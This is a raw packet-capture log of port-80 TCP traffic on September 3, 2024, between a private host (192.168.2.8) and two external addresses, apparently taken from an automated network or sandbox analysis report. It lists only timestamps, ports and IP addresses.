Sep 3, 2024 17:13:21.435686111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435817003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435827971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435837984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435848951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435859919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435874939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435884953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435889959 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435889959 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435898066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435904026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.435934067 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.435973883 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.436151981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436162949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436172962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436184883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436196089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436204910 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436209917 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.436209917 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.436216116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436228991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436235905 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.436239958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436250925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436263084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436264038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.436285973 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.436285973 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.436321974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.436449051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436459064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436501026 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.436512947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436525106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436559916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.436583042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436594963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436605930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436618090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436621904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.436630011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.436695099 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.436702967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.436702967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.438576937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.438591003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.438601017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.438637972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.438664913 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.438666105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.438678026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.438688040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.438702106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.438724041 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.438724041 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.438745022 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.438846111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.438863993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.438874006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.438885927 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.438896894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.438905954 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.438906908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.438920021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.438931942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.438939095 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.438939095 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.438944101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.438982964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.438982964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.439763069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.439821959 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.439857960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.439870119 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.439881086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.439893961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.439904928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.439914942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.439914942 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.439944029 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.439966917 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.440010071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.440021038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.440036058 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.440047026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.440047979 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.440058947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.440062046 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.440069914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.440077066 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.440083027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.440089941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.440109015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.440151930 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.440160036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.440171957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.440181971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.440191984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.440202951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.440212965 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.440222025 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.440229893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.440232038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.440242052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.440256119 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.440270901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.440270901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.440304995 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.441898108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.441914082 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.441931009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.441942930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.441953897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.441960096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.441970110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.441979885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.441982031 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.441992998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.442003012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.442008972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.442008972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.442015886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.442027092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.442033052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.442039013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.442039967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.442045927 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.442051888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.442063093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.442069054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.442097902 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.442107916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.448529959 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.448550940 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.448563099 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.448585033 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.448611021 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.448638916 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.448651075 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.448662043 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.448674917 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.448687077 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.448698044 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.448726892 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.449218988 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.449239969 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.449275970 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.449299097 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.449311972 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.449322939 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.449337959 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.449389935 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.449496031 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.449506998 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.449522972 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.449537039 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.449549913 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.506314993 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.506406069 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.506529093 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.506580114 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.530165911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530179977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530198097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530240059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530241013 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.530252934 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530265093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530272007 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.530277967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530318975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.530318975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.530353069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530365944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530376911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530388117 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530425072 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.530425072 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.530447960 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.530738115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530750990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530761957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530775070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530785084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530795097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530803919 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.530806065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530823946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530836105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.530837059 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.530844927 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530859947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530860901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.530870914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530879974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.530884027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530901909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530910015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.530917883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530937910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.530937910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.530972004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.530982971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531013012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.531013012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.531157017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531167984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531177998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531188965 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531199932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531210899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531215906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.531215906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.531223059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531235933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531246901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531248093 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.531265020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531275988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531286955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.531287909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531286955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.531300068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531311989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531330109 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.531358004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.531358004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.531533003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531544924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531599045 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.531614065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531625032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531636953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531649113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531663895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531673908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531683922 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.531683922 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.531686068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531708002 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.531742096 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.531884909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531896114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531907082 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531919003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.531938076 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.531968117 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.532025099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.532037973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.532049894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.532061100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.532083035 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.532147884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.533946037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.533965111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.533976078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.533998013 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.534032106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.534094095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534105062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534116030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534126997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534161091 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.534161091 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.534260988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534271955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534281969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534293890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534305096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534317970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534320116 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.534329891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534341097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534352064 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.534352064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534352064 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.534360886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.534363985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534426928 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.534426928 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.534591913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534604073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534615040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534678936 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.534678936 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.534706116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534718990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534729004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534739017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534749031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534759998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534775972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.534775972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.534832001 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.534894943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534910917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.534969091 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.534969091 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.534996033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535059929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.535151005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535218000 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.535223007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535234928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535244942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535258055 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535284996 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.535324097 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.535324097 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.535372972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535383940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535393953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535406113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535433054 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.535446882 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.535505056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535516024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535525084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535537958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535550117 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535554886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.535566092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535577059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535586119 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.535588980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535604954 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.535615921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535634041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.535635948 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.535679102 CEST	49730	80	192.168.2.8	52.212.52.84
